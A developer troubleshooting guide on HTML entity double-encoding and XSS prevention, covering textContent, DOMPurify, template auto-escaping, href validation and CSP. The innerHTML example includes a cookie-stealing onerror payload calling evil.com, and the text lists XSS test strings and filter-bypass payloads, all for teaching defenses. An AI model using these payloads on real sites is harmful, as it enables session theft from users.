HTML Entity Encoding Errors: Fixing Display Bugs and XSS Vulnerabilities
Quick answer
💡HTML entities like &lt; appearing as literal text instead of < means double-encoding: the string was encoded twice. Set element.textContent (not innerHTML) to display user input safely without XSS risk. Use DOMParser or a DOM element to decode HTML entities in JavaScript. React automatically escapes {expressions}, so only dangerouslySetInnerHTML requires manual sanitization.
Error symptoms
- ✕Page displays &lt; or &amp; literally instead of < or &
- ✕Apostrophes appear as &#39; or &apos; in rendered text that should show as '
- ✕HTML tags appear as visible text (<b>) instead of bold formatting
- ✕User-submitted content with special characters shows garbled output in some browsers
- ✕XSS vulnerability: script tags in user input executing as JavaScript
- ✕Email template renders &nbsp; literally instead of a non-breaking space on some clients
Common causes
- •Double-encoding: calling an HTML escape function on already-escaped content
- •Using innerHTML to insert user content without sanitization, enabling XSS
- •Confusing HTML entity encoding with URL percent-encoding and applying the wrong one
- •Template engine auto-escaping combined with manual pre-escaping, causing double encoding
- •Not decoding HTML entities before displaying stored content in a text context (email body, PDF)
- •Using HTML named entities (&nbsp;) in XML contexts that only recognize numeric references and the five predefined XML entities
When it happens
- •When displaying user-generated content from a database where content was stored with HTML encoding
- •When a template engine like Handlebars, Mustache, or Jinja2 auto-escapes values that are already escaped
- •When rendering content inside a React component using dangerouslySetInnerHTML
- •When converting HTML content to plain text for email subjects or push notifications
- •When building a rich text editor that stores HTML and must sanitize before rendering
Examples and fixes
Using textContent prevents XSS by treating the value as plain text. Using innerHTML with user input is an XSS vulnerability.
Safely displaying user content: textContent vs innerHTML
❌ Wrong
// Wrong: XSS vulnerability, user input is parsed as HTML
function displayUserComment(comment) {
  const div = document.createElement('div');
  div.innerHTML = comment; // markup is parsed; event handlers such as onerror will run
  document.getElementById('comments').appendChild(div);
}
// Attacker submits: <img src=x onerror="fetch('https://evil.com?c='+document.cookie)">
// The onerror handler fires and sends the user's cookies
✅ Fixed
// Correct: textContent treats the value as plain text, never HTML
function displayUserComment(comment) {
  const div = document.createElement('div');
  div.textContent = comment; // safe: all characters displayed literally
  document.getElementById('comments').appendChild(div);
}
// For rich text with allowed formatting, use DOMPurify:
import DOMPurify from 'dompurify';
function displayRichComment(html) {
  const div = document.createElement('div');
  div.innerHTML = DOMPurify.sanitize(html, {
    ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
    ALLOWED_ATTR: ['href']
  });
  document.getElementById('comments').appendChild(div);
}
element.innerHTML parses the assigned string as HTML. Script elements inserted this way are not executed, but event-handler attributes (such as onerror), javascript: URLs, and other JavaScript-carrying constructs are, so the exposure is the same. element.textContent treats the entire string as a text node: < and & are kept as literal characters (and serialized as &lt; and &amp; if the markup is read back), so no HTML is ever interpreted. This is the primary defense against stored and reflected XSS in vanilla JavaScript. For cases where you must allow some HTML formatting (bold, links), use the DOMPurify library (npm: dompurify), which uses an allowlist to remove dangerous tags and attributes while preserving safe formatting. Never build your own HTML sanitizer with regex: it is extremely difficult to cover all attack vectors.
When a template engine auto-escapes and you also manually escape, output shows &lt; instead of <.
Fixing double-encoded HTML entities in template output
❌ Wrong
// Server: manually escaping before passing to Handlebars
const he = require('he');
const Handlebars = require('handlebars');
const template = Handlebars.compile('<p>{{content}}</p>');
const userInput = '<script>alert(1)</script>';
// Double encoding: he.encode() + Handlebars auto-escape
// (useNamedReferences makes he emit &lt; instead of its default hex form &#x3C;)
const escaped = he.encode(userInput, { useNamedReferences: true }); // &lt;script&gt;alert(1)&lt;/script&gt;
const html = template({ content: escaped });
// Output: <p>&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;</p>
// Browser shows: &lt;script&gt;alert(1)&lt;/script&gt; (wrong)
✅ Fixed
const Handlebars = require('handlebars');
const template = Handlebars.compile('<p>{{content}}</p>');
const userInput = '<script>alert(1)</script>';
// Let Handlebars auto-escape handle it: do NOT pre-escape
const html = template({ content: userInput });
// Output: <p>&lt;script&gt;alert(1)&lt;/script&gt;</p>
// Browser shows: <script>alert(1)</script> (correct literal text)
// If you need to render trusted HTML: use triple braces {{{html}}}
// But only for trusted, pre-sanitized HTML content
Handlebars' {{variable}} syntax automatically HTML-encodes the value: < becomes &lt;, & becomes &amp;, and so on. If you also run he.encode() (or any other escaping function) on the value before passing it to the template, each special character gets encoded twice. The first pass converts < to &lt;. The second pass (Handlebars) converts the & in &lt; to &amp;, producing &amp;lt;. The browser then decodes &amp;lt; to &lt; and displays those four characters as literal text rather than as an angle bracket. The fix is to let exactly one layer perform the escaping. With Handlebars, the template does it, so pass the raw value. With triple braces {{{variable}}}, Handlebars skips escaping, so you must sanitize before passing.
Why HTML entity encoding errors occur
HTML entity encoding exists because the HTML specification reserves certain characters for markup syntax. The five characters conventionally escaped in HTML are: < (less-than, starts a tag), > (greater-than, ends a tag), & (ampersand, starts an entity), " (double quote, delimits attribute values), and ' (apostrophe, delimits attribute values). HTML entities provide a way to include these characters as literal text: &lt; for <, &gt; for >, &amp; for &, &quot; for ", and &#39; or &apos; for '.
Double-encoding is the most common display bug. It happens when HTML entities are encoded more than once. The string 'Tom & Jerry' correctly encodes to 'Tom &amp; Jerry' after one round of encoding. If encoded again, the & in &amp; becomes &amp; itself, producing 'Tom &amp;amp; Jerry', which the browser displays as 'Tom &amp; Jerry', with the literal characters &amp; visible on screen instead of &. This usually happens when template engines auto-escape values that were already manually escaped, or when content is stored in escaped form in a database and then escaped again when rendering.
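The 'Tom & Jerry' case can be reproduced in a few lines. This is a minimal sketch: escapeHtml is a hypothetical helper written for illustration (it is not taken from any library), and it covers only the five characters discussed above.

```javascript
// Hypothetical helper for illustration: escapes the five characters discussed above.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;') // must run first, or it would re-encode the entities added below
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

const raw = 'Tom & Jerry';
const once = escapeHtml(raw);   // 'Tom &amp; Jerry'     -> browser displays: Tom & Jerry
const twice = escapeHtml(once); // 'Tom &amp;amp; Jerry' -> browser displays: Tom &amp; Jerry

console.log(once);
console.log(twice);
```

The second call has no way of knowing its input was already escaped, which is why the fix is organizational (exactly one layer escapes) rather than a smarter escape function.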
XSS (Cross-Site Scripting) is the security consequence of insufficient HTML encoding. When user-supplied content is inserted into a page's HTML without escaping, an attacker can inject JavaScript that executes in the victim's browser. A stored XSS attack stores the malicious script in the database; every user who views the content triggers the script. A reflected XSS attack includes the script in a URL parameter; clicking the link executes the script in the victim's session. Both are prevented by consistently escaping user content at render time.
Named versus numeric entities introduce compatibility issues. Named entities like &nbsp; (non-breaking space) and &copy; (copyright symbol) are supported in HTML but not in plain XML. SVG files, XML-based email templates, and XHTML parsed as XML without its DTD only support the five predefined XML entities: &lt;, &gt;, &amp;, &quot;, and &apos;. If you use &nbsp; in an SVG file or XML document, the parser will throw 'undefined entity' errors. Use &#160; (numeric decimal) or &#xA0; (numeric hex) for the non-breaking space in XML contexts.
Diagnosing HTML entity encoding bugs
When entity text like &amp; or &lt; appears literally on the page, right-click and inspect the element in browser devtools, then compare the raw HTML source (View Source, or Edit as HTML in the Elements panel) with the rendered text. If the source shows &amp;amp; (an encoded ampersand followed by amp;), the content has been double-encoded. If the source shows &amp; and the page displays &, that is correct behavior: the browser is decoding it. There is a bug only if &amp; appears as literal text on screen (the five characters &, a, m, p, ;).
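The same check can be run over stored content or rendered markup in bulk. The sketch below is a heuristic only: looksDoubleEncoded is a hypothetical name, and the pattern will also flag pages that legitimately discuss entities (such as this one), so treat a match as a prompt to inspect, not as proof.

```javascript
// Matches an encoded ampersand that is immediately followed by the rest of an
// entity, e.g. &amp;lt;  &amp;amp;  &amp;#39;  &amp;#x27;
const DOUBLE_ENCODED = /&amp;(?:[a-z][a-z0-9]*|#\d+|#x[0-9a-f]+);/i;

// Hypothetical helper: returns true when the raw markup contains a likely
// double-encoded entity.
function looksDoubleEncoded(markup) {
  return DOUBLE_ENCODED.test(markup);
}

console.log(looksDoubleEncoded('<p>Tom &amp; Jerry</p>'));       // single encoding
console.log(looksDoubleEncoded('<p>Tom &amp;amp; Jerry</p>'));   // double encoding
console.log(looksDoubleEncoded('<p>&amp;lt;b&amp;gt;bold</p>')); // double encoding
```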
For XSS vulnerability diagnosis, test by inserting the string <script>alert('XSS')</script> into every user input field. If an alert box appears when the page is loaded (stored XSS) or when you submit and view the page (reflected XSS), the input is not being escaped. For more targeted testing, try the string " onmouseover="alert(1) in an input that appears in an HTML attribute context — if hovering triggers an alert, attribute encoding is missing. Use OWASP's XSS testing guide for a complete checklist.
For JavaScript code that renders HTML, check every use of innerHTML, outerHTML, and insertAdjacentHTML. Each of these can run JavaScript if the value contains event-handler attributes or javascript: URLs (script tags inserted this way do not execute, but that offers no real protection). Search the codebase for them: grep -r 'innerHTML\|outerHTML\|insertAdjacentHTML' src/. Verify that each usage either receives a trusted, sanitized string or is replaced with textContent.
For React applications, check every use of dangerouslySetInnerHTML. React auto-escapes all {expressions} in JSX, but dangerouslySetInnerHTML bypasses this protection. Also check for string concatenation with user data in template literals that are then passed to innerHTML in vanilla JS code embedded in useEffect or event handlers.
Fixing HTML entity encoding issues correctly
For displaying plain text content from users, always use element.textContent in vanilla JavaScript or text interpolation {value} in React JSX. Both treat < and & as literal characters (they serialize as &lt; and &amp; in the resulting HTML), so no manual escaping is needed. This is the safest approach because it treats all content as text, never as markup.
For decoding HTML entities in JavaScript (reading encoded text to display in a non-HTML context like a textarea value or plain text email), use a DOM element as a decoder: const el = document.createElement('textarea'); el.innerHTML = encodedString; const decoded = el.value. This works because assigning to innerHTML parses the entities, and reading .value returns the decoded plain text. A textarea is used instead of a div because its content is parsed as plain text: no child elements are created, so markup such as <img onerror=...> in the input never becomes a live element. In Node.js, the 'he' package provides he.decode() for server-side entity decoding without a DOM.
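To make the decoding step concrete without a DOM, here is a deliberately small sketch. decodeBasicEntities and its NAMED_ENTITIES table are hypothetical and handle only numeric references plus a handful of named entities; HTML defines far more, so production code should rely on the browser or a maintained library such as he.

```javascript
// Deliberately tiny table for illustration; HTML defines many more named references.
const NAMED_ENTITIES = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", nbsp: '\u00A0' };

// Hypothetical helper: decodes one level of entities in a single pass.
function decodeBasicEntities(text) {
  return text.replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);/g, (match, body) => {
    if (body[0] !== '#') {
      // Named entity: leave unknown names untouched.
      return Object.prototype.hasOwnProperty.call(NAMED_ENTITIES, body)
        ? NAMED_ENTITIES[body]
        : match;
    }
    // Numeric reference: &#39; (decimal) or &#x27; (hex).
    const isHex = body[1] === 'x' || body[1] === 'X';
    const codePoint = parseInt(body.slice(isHex ? 2 : 1), isHex ? 16 : 10);
    const isValid =
      codePoint > 0 &&
      codePoint <= 0x10ffff &&
      !(codePoint >= 0xd800 && codePoint <= 0xdfff); // skip surrogates
    return isValid ? String.fromCodePoint(codePoint) : match;
  });
}

console.log(decodeBasicEntities('Tom &amp; Jerry'));
console.log(decodeBasicEntities('&lt;b&gt;it&#39;s&lt;/b&gt;'));
```

Because the replacement runs in a single pass, a double-encoded value such as &amp;lt; decodes by one level only (to &lt;), which mirrors what a browser does.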
For server-side template engines, know whether your template auto-escapes by default and never manually escape before passing to an auto-escaping template. In Handlebars, {{variable}} auto-escapes; {{{variable}}} does not. In Jinja2/Nunjucks, {{ variable }} auto-escapes when autoescaping is enabled. In EJS, <%= variable %> auto-escapes; <%- variable %> does not. The pattern is: raw data in, template handles escaping.
For React, dangerouslySetInnerHTML must only receive sanitized HTML. Use DOMPurify (client-side) or the sanitize-html npm package (both client and server) with an explicit allowlist of permitted tags and attributes. Do not write your own sanitizer or use regex to strip tags — both approaches miss attack vectors like malformed HTML, SVG event handlers, and JavaScript in CSS.
For email templates with HTML entities, test across multiple email clients: Gmail, Outlook (2016-2022), Apple Mail, and the AOL/Yahoo webmail clients. Outlook uses Microsoft Word as its HTML rendering engine, which has different entity support than browser HTML parsers. For maximum compatibility, use numeric entities (&#160; for non-breaking space) rather than named entities, and test with Litmus or Email on Acid.
Attribute encoding, SVG context, and React edge cases
HTML attribute encoding requires different treatment than text content encoding. In an HTML attribute value like <input value="{userInput}">, the characters that must be escaped differ depending on whether the attribute is quoted (double quotes, single quotes) or unquoted. For maximum safety, always quote attributes and escape &, ", <, >, and / in the attribute value. Setting element.setAttribute('value', userInput) in JavaScript avoids the problem: the DOM API stores the string as the attribute value without parsing it as HTML. Constructing HTML strings with template literals for attribute values is dangerous without careful escaping.
SVG inline in HTML has a dual-context problem. SVG attributes can contain JavaScript via event handlers like onclick="evil()" and via href="javascript:...". A sanitizer that is safe for HTML may not be safe for inline SVG, because SVG has additional event attributes that are specific to SVG elements (like onbegin, onrepeat). DOMPurify sanitizes SVG as well as HTML, and {USE_PROFILES: {svg: true}} restricts its output to the SVG allowlist. If you are embedding user-controlled SVG, run it through a sanitizer that explicitly supports SVG.
React's auto-escaping applies to JSX expressions like {value} and to HTML attributes set via JSX props like className={value}. However, escaping does not protect href attributes when the value is a javascript: URL. React renders <a href={userUrl}> with the value intact, and if userUrl is 'javascript:alert(1)', clicking the link executes JavaScript. Validate href values to ensure they start with 'http://', 'https://', or '/' before using them in anchor tags. React 16.9 through 18 log a warning for javascript: URLs but do not block them, so validate regardless of the React version in use.
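One way to implement the href check is to parse the value rather than compare string prefixes. The sketch below swaps in the built-in URL class for the prefix test described above; isSafeHref, the allowlist, and the example.invalid base used to resolve relative paths are all assumptions for illustration.

```javascript
// Assumed allowlist: extend it (e.g. with 'mailto:') only if the application needs to.
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// Hypothetical helper: true when the value resolves to an http(s) URL.
// Relative values such as '/profile' are resolved against a placeholder base.
function isSafeHref(value, base = 'https://example.invalid/') {
  try {
    const url = new URL(value, base);
    return ALLOWED_PROTOCOLS.has(url.protocol);
  } catch {
    return false; // unparsable input is rejected
  }
}

console.log(isSafeHref('https://example.com/page'));
console.log(isSafeHref('/profile'));
console.log(isSafeHref('javascript:alert(1)'));
```

In a component this would gate the prop, for example rendering href={isSafeHref(userUrl) ? userUrl : undefined}. Parsing normalizes the scheme, so mixed-case variants such as JaVaScRiPt: are rejected as well.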
DOMParser provides a clean API for parsing HTML strings in modern browsers. const doc = new DOMParser().parseFromString(htmlString, 'text/html'); const text = doc.body.textContent strips all HTML tags and returns plain text with entities decoded. This is useful for converting HTML-formatted API responses to plain text for use in alt attributes, page titles, or notification messages. Like the textarea approach, DOMParser does not execute scripts: the document it returns is inert.
Common HTML encoding mistakes in modern applications
Sanitizing with regex is one of the most persistent mistakes in web security. Developers write patterns like str.replace(/<script>/gi, '') or str.replace(/<[^>]+>/g, '') thinking they strip all dangerous HTML. These patterns are defeated by nested tags (<scr<script>ipt>), script tags with attributes or whitespace, JavaScript in non-script contexts (<img src=x onerror=...>), and HTML entity obfuscation (&#106;avascript:). Use DOMPurify or sanitize-html, backed by a CSP header, not regex.
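The nested-tag bypass is easy to demonstrate. In this sketch, naiveStripScripts is a hypothetical stand-in for the kind of regex filter described above; it is shown only to illustrate why the approach fails.

```javascript
// Hypothetical naive filter: removes <script> and </script> tags in one pass.
function naiveStripScripts(input) {
  return input.replace(/<\/?script>/gi, '');
}

// Removing the inner tags splices the outer fragments back into a working tag.
const nested = '<scr<script>ipt>alert(1)</scr</script>ipt>';
console.log(naiveStripScripts(nested)); // <script>alert(1)</script>

// Payloads that never use a script tag pass through untouched.
const handler = '<img src=x onerror=alert(1)>';
console.log(naiveStripScripts(handler)); // <img src=x onerror=alert(1)>
```

Looping the replacement until the string stops changing fixes the first case but not the second, which is why an allowlist-based parser is the recommended tool.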
Mixing encoding contexts within a single string is a common source of both display bugs and security vulnerabilities. For example, a JavaScript string may be inserted into an HTML attribute whose value is then evaluated as CSS: each context has different encoding requirements, and a mistake in any layer allows injection. The principle of context-appropriate encoding is to escape for the innermost context first, then for each outer context in turn. For a string inside a JavaScript string literal, escape quotes and backslashes. For JavaScript inside an HTML attribute, then encode the result for HTML attributes. This nesting must be handled correctly at each layer.
Not encoding special characters in JSON that will be embedded in an HTML script tag is a classic vulnerability. If server-side code renders JSON data directly into a script block, as in <script>var data = {{{json}}}</script>, and the JSON contains </script>, that sequence terminates the script block prematurely. The safe pattern is to replace < with \u003C, > with \u003E, and & with \u0026 in JSON that will appear inside a script tag. The escaped JSON still evaluates to exactly the same data, but the </script> sequence no longer appears in the markup, so it cannot terminate the HTML script block.
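A minimal sketch of that replacement, assuming the server builds the JSON with JSON.stringify; jsonForScriptTag and the sample payload are hypothetical names used for illustration.

```javascript
// Hypothetical helper: serializes data so it is safe to place inside <script>...</script>.
function jsonForScriptTag(data) {
  return JSON.stringify(data)
    .replace(/</g, '\\u003C')
    .replace(/>/g, '\\u003E')
    .replace(/&/g, '\\u0026');
}

const payload = { comment: '</script><script>alert(1)</script>' };
const embedded = jsonForScriptTag(payload);

// The output contains no literal "<", so the HTML parser cannot see "</script>".
console.log(embedded);

// The escapes are ordinary JSON/JavaScript string escapes, so the data round-trips.
console.log(JSON.parse(embedded).comment === payload.comment);
```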
Confusing entity encoding with URL encoding is a common category error. &amp; is the HTML entity for &. %26 is the URL percent-encoding for &. They are different encodings for different contexts. A URL in an HTML href attribute needs its components percent-encoded first, then the whole URL HTML-encoded: /search?q=Tom & Jerry becomes href="/search?q=Tom%20%26%20Jerry", and a separator between parameters is written as &amp;, as in href="/search?q=Tom%20%26%20Jerry&amp;page=2". Mixing them up, by using %26 in an HTML text node or &amp; inside a URL query value, produces incorrect output.
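The two layers can be applied in order as follows. This is a sketch under stated assumptions: buildSearchHref, escapeHtmlAttr, and the page parameter are hypothetical, and /search is the path used in the example above.

```javascript
// Hypothetical helper: HTML-encodes a string for use inside a quoted attribute.
function escapeHtmlAttr(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Step 1: percent-encode each query value. Step 2: HTML-encode the finished URL.
function buildSearchHref(query, page) {
  const url = '/search?q=' + encodeURIComponent(query) + '&page=' + encodeURIComponent(page);
  return escapeHtmlAttr(url);
}

const href = buildSearchHref('Tom & Jerry', 2);
console.log('<a href="' + href + '">results</a>');
// <a href="/search?q=Tom%20%26%20Jerry&amp;page=2">results</a>
```

The & inside the query value becomes %26 (URL layer), while the & separating parameters becomes &amp; (HTML layer); the browser undoes the HTML layer before the URL is requested.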
Best practices for HTML encoding in web applications
Adopt a context-sensitive output encoding strategy. OWASP's XSS prevention guidance distinguishes several encoding contexts, including HTML text content, HTML attribute values, JavaScript strings, CSS values, URL parameters, and URL paths. Each context has different dangerous characters and different escaping requirements. A security-conscious framework like React handles the first two automatically in JSX. For the others, use library functions: encodeURIComponent() for URL parameters, CSS.escape() for CSS selectors, and JSON.stringify() for JavaScript values.
Implement a Content Security Policy (CSP) header as a defense-in-depth measure. CSP restricts which scripts, styles, and other resources a page can load. A strict CSP like Content-Security-Policy: default-src 'self'; script-src 'self' prevents inline script injection even if XSS encoding is missed somewhere. Start with a report-only mode (Content-Security-Policy-Report-Only) to see what would be blocked before enforcing. Nonce-based CSP (adding a random nonce per request to allowed scripts) is more flexible than hash-based CSP for dynamic applications.
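A nonce-based policy can be sketched in a few lines of Node.js. buildCspHeader is a hypothetical helper, and the policy string is just the example policy above with a nonce added; a real policy usually needs more directives.

```javascript
const crypto = require('crypto');

// Hypothetical helper: creates a fresh nonce and the matching header value.
// Call it once per response; never reuse a nonce across requests.
function buildCspHeader() {
  const nonce = crypto.randomBytes(16).toString('base64');
  const value = `default-src 'self'; script-src 'self' 'nonce-${nonce}'`;
  return { nonce, value };
}

const csp = buildCspHeader();
console.log('Content-Security-Policy: ' + csp.value);
// Inline scripts the server itself emits carry the same nonce:
console.log('<script nonce="' + csp.nonce + '">/* trusted inline code */</script>');
```

An injected inline script cannot know the nonce for the current response, so the browser refuses to run it. While evaluating the policy, the same value can be sent under the Content-Security-Policy-Report-Only header name instead.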
For rich text editors (Quill, TipTap, Slate, CKEditor), always sanitize the HTML output on the server before storing and again before rendering. Client-side sanitization is a convenience, not a security control — attackers can bypass it by sending requests directly to your API without going through the browser. The server must validate and sanitize all HTML before storage. Use a configurable library with an explicit allowlist of permitted tags, attributes, and CSS properties.
Test your encoding with a comprehensive set of XSS payloads. The OWASP XSS Filter Evasion Cheat Sheet provides hundreds of attack vectors that bypass naive sanitization. The key insight is that HTML parsers in browsers are extremely permissive: they accept malformed, partial, and creative HTML that a strict parser would reject. Security testing with a handful of <script> tags is insufficient; use an automated scanner like OWASP ZAP or Burp Suite's active scan for thorough XSS testing.
Quick fix checklist
- ✓Replace innerHTML assignments with textContent for any user-supplied text content
- ✓Check for double-encoding: inspect the HTML source for &amp;lt; or &amp;amp; patterns
- ✓Use DOMPurify or sanitize-html for rich HTML content — never regex-based sanitization
- ✓Verify React dangerouslySetInnerHTML uses DOMPurify-sanitized content only
- ✓Validate href values to reject javascript: URLs before using in anchor tags
- ✓Use numeric entities (&#160;) in XML/SVG contexts instead of named entities (&nbsp;)
- ✓Set Content-Security-Policy header as defense-in-depth against XSS
- ✓Never manually escape before passing to a template engine that auto-escapes
Frequently asked questions
Why does my page show &lt; instead of <?
Your content has been double-encoded. The character < was first encoded to &lt;, then encoded again, converting the & in &lt; to &amp; and producing &amp;lt;. This typically happens when content is manually escaped before being passed to a template engine that also auto-escapes. Fix by removing the manual escaping step and letting the template engine handle it exactly once.
What is the difference between textContent and innerHTML?
textContent sets or gets the plain text content of an element, treating all characters as literal text: a < in the string is stored as a < character in a text node and displayed as <, without interpretation. innerHTML parses the assigned string as HTML, interpreting tags and activating event handlers. For displaying user-supplied content, always use textContent. innerHTML should only receive trusted, sanitized HTML from controlled sources.
Does React automatically prevent XSS?
React automatically escapes values in JSX expressions {value} and JSX attributes, preventing most XSS. However, it does not protect dangerouslySetInnerHTML, href attributes with javascript: URLs, or DOM manipulation via useRef and direct DOM API calls (element.innerHTML = ...). React's protection applies to JSX rendering only. Always sanitize HTML passed to dangerouslySetInnerHTML using DOMPurify.
How do I decode HTML entities in JavaScript?
Create a textarea element, set its innerHTML to the encoded string, then read its value: const el = document.createElement('textarea'); el.innerHTML = encodedString; return el.value. The browser decodes entities when parsing innerHTML, and reading .value returns the plain text. In Node.js, use the he package: he.decode(encodedString). DOMParser also works in browsers and does not execute scripts, but reading textContent from its result strips any tags in the input, so prefer the textarea approach when the decoded text may legitimately contain < or >.
What HTML entities must always be escaped in text content?
In HTML text content (between tags), you must escape & as &amp; and < as &lt;. The > character is technically safe in text content but is conventionally escaped as &gt;. In attribute values, you must also escape " as &quot; (in double-quoted attributes) or ' as &#39; or &apos; (in single-quoted attributes). Modern HTML serializers escape all five to be safe in all contexts.
Why does &apos; not work in some contexts?
&apos; (apostrophe entity) is defined in HTML5 but was not in HTML4. XML defines it, so it works in XHTML parsed as XML, but XHTML 1.0 pages served as text/html to HTML4-era browsers could not rely on it. In HTML email templates rendered by Outlook (which uses a Word-based HTML engine), &apos; may appear literally. For maximum compatibility across email clients and legacy browsers, use &#39; (decimal) or &#x27; (hex) for the apostrophe character.
Can I safely use DOMParser to strip HTML tags?
Yes, new DOMParser().parseFromString(html, 'text/html').body.textContent strips all HTML tags and decodes entities, returning plain text. This is safe for extracting text from trusted HTML (e.g., converting your own HTML email templates to plain text). For untrusted user-supplied HTML, use DOMPurify first to sanitize, then optionally use textContent to extract plain text. DOMParser in a browser does not execute script tags.
What is a Content Security Policy and how does it help?
Content Security Policy (CSP) is an HTTP response header that declares which scripts, stylesheets, and other resources a page may load. A strict CSP like script-src 'self' prevents the browser from executing inline scripts and scripts from untrusted origins, significantly limiting XSS impact even if an injection vulnerability exists. CSP is a defense-in-depth measure — it does not replace proper HTML encoding, but it limits what an attacker can do if encoding is missed somewhere.
Last updated: 2026-05-06.